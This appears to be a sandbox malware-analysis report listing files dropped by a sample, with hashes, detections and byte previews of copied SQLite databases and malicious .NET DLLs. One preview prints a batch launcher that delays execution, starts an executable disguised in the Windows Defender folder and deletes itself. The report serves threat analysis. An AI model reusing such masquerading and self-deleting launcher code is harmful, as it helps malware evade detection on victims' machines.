                                                                                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\77CEpbjVho

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28672
                                                                                                                              Entropy (8bit):2.5793180405395284
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\7IED4XG4iO

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):106496
                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):245
                                                                                                                              Entropy (8bit):5.389148345240419
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:hCijTg3Nou1SV+DER5SMLeAQf8fbSKOZG1wkn23f3q:HTg9uYDEfSMEfObIfS
                                                                                                                              MD5:B7B6FF3BC3BC7C559B5F22417FD50208
                                                                                                                              SHA1:AC325AD5DC5697C4CB967C4E48834385EA0B43B8
                                                                                                                              SHA-256:B19588F5CA7C1C1AF17113A563482AD9195EAFA0C51E7E5847AAE922A6F602CF
                                                                                                                              SHA-512:8ED00ECA924C1B47B22A58C7E706A152A63EB7E5EF470315ECB965F9ABD12B59E91989DA67087533C00F88F4872FD614249201B28EB9A48C82D8294515FA6FCF
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\7aQ0YIT0mX.bat"

                                                                                                                              C:\Users\user\AppData\Local\Temp\CDRiHnF66y

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):49152
                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\CegCJVAgFM

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):5242880
                                                                                                                              Entropy (8bit):0.037963276276857943
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\NrsdAkM3eS

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40960
                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\QAmnPP6v1Z

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):98304
                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\QqHA8RpDPM

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):114688
                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\R8wLxpz5FS

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):40960
                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\RAzUlb25IC

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):14
                                                                                                                              Entropy (8bit):3.378783493486176
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                                                                              MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                                                                              SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                                                                              SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                                                                              SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                                                                              Malicious:false
                                                                                                                              Preview:{"Surveys":{}}

                                                                                                                              C:\Users\user\AppData\Local\Temp\gLYsbvyxi6

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):159744
                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\iGvSsWpSkz

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):126976
                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\ii0xQfCo43

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):25
                                                                                                                              Entropy (8bit):4.293660689688185
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:xrn26tGqUIg:tn26tGz
                                                                                                                              MD5:8596D21E3D9F915C6B369DB324B66BA1
                                                                                                                              SHA1:4FFF5D38B29770048274A895A60527AEDC71A36C
                                                                                                                              SHA-256:F0D3A272F34C9116B5C0580C2B38A4AC12682605D0D06F9CE22C20DD2D8611D8
                                                                                                                              SHA-512:12637CD0BBCD27A68DE1724FB7FA31347F02294ADAB11570FDE87031627190DD3688794CAD168001514B7DD8022A5E7A8D640283F71323EC0F26E9CCE0D02901
                                                                                                                              Malicious:false
                                                                                                                              Preview:nSWNsTopAoEBk0HcOE4meToDw

                                                                                                                              C:\Users\user\AppData\Local\Temp\qrosYkIoqe

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20480
                                                                                                                              Entropy (8bit):0.5707520969659783
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Temp\wKJkBeE85K

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):25
                                                                                                                              Entropy (8bit):4.163856189774724
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:5d82n:Ln
                                                                                                                              MD5:02259ED05CEAF2B4DE9DE5614EF0FB1C
                                                                                                                              SHA1:62BD3DEE56FEB97B5F8764AD8DF1005F11CD4E19
                                                                                                                              SHA-256:58E0AD63479DEC6801CACA1A09D59F52A4B8F8D841568631CF4EE911D1158831
                                                                                                                              SHA-512:DA2E4162E987E48258DC5B8DF941F0EDB209265D50CBD3DE56EF153712A0C299B855C34E17E213910215D2BCFB690274FC35362A6B671759A6D9DEEDBB5A1DFE
                                                                                                                              Malicious:false
                                                                                                                              Preview:nyH371oQSK7zfoIBlcxTiyzQS

                                                                                                                              C:\Users\user\AppData\Local\Temp\zKzKskpn9v

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):20480
                                                                                                                              Entropy (8bit):0.5712781801655107
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                              Malicious:false
                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\ADqcsYvZ.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\Z4D3XAZ2jB.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32256
                                                                                                                              Entropy (8bit):5.631194486392901
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: 67VB5TS184.exe, Detection: malicious, Browse
                                                                                                                              • Filename: 4t8f8F3uT1.exe, Detection: malicious, Browse
                                                                                                                              • Filename: F3ePjP272h.exe, Detection: malicious, Browse
                                                                                                                              • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                                                                                              • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                                                                                              • Filename: 6G8OR42xrB.exe, Detection: malicious, Browse
                                                                                                                              • Filename: XNPOazHpXF.exe, Detection: malicious, Browse
                                                                                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                                                              • Filename: 8k1e14tjcx.exe, Detection: malicious, Browse
                                                                                                                              • Filename: gkcQYEdJSO.exe, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\CFoRreZv.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):38912
                                                                                                                              Entropy (8bit):5.679286635687991
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\CNYkWNAB.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):85504
                                                                                                                              Entropy (8bit):5.8769270258874755
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                              C:\Users\user\Desktop\DldKqVbv.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):294912
                                                                                                                              Entropy (8bit):6.010605469502259
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                              C:\Users\user\Desktop\GmHIOoGs.log

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):126976
                                                                                                                              Entropy (8bit):6.057993947082715
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 21%
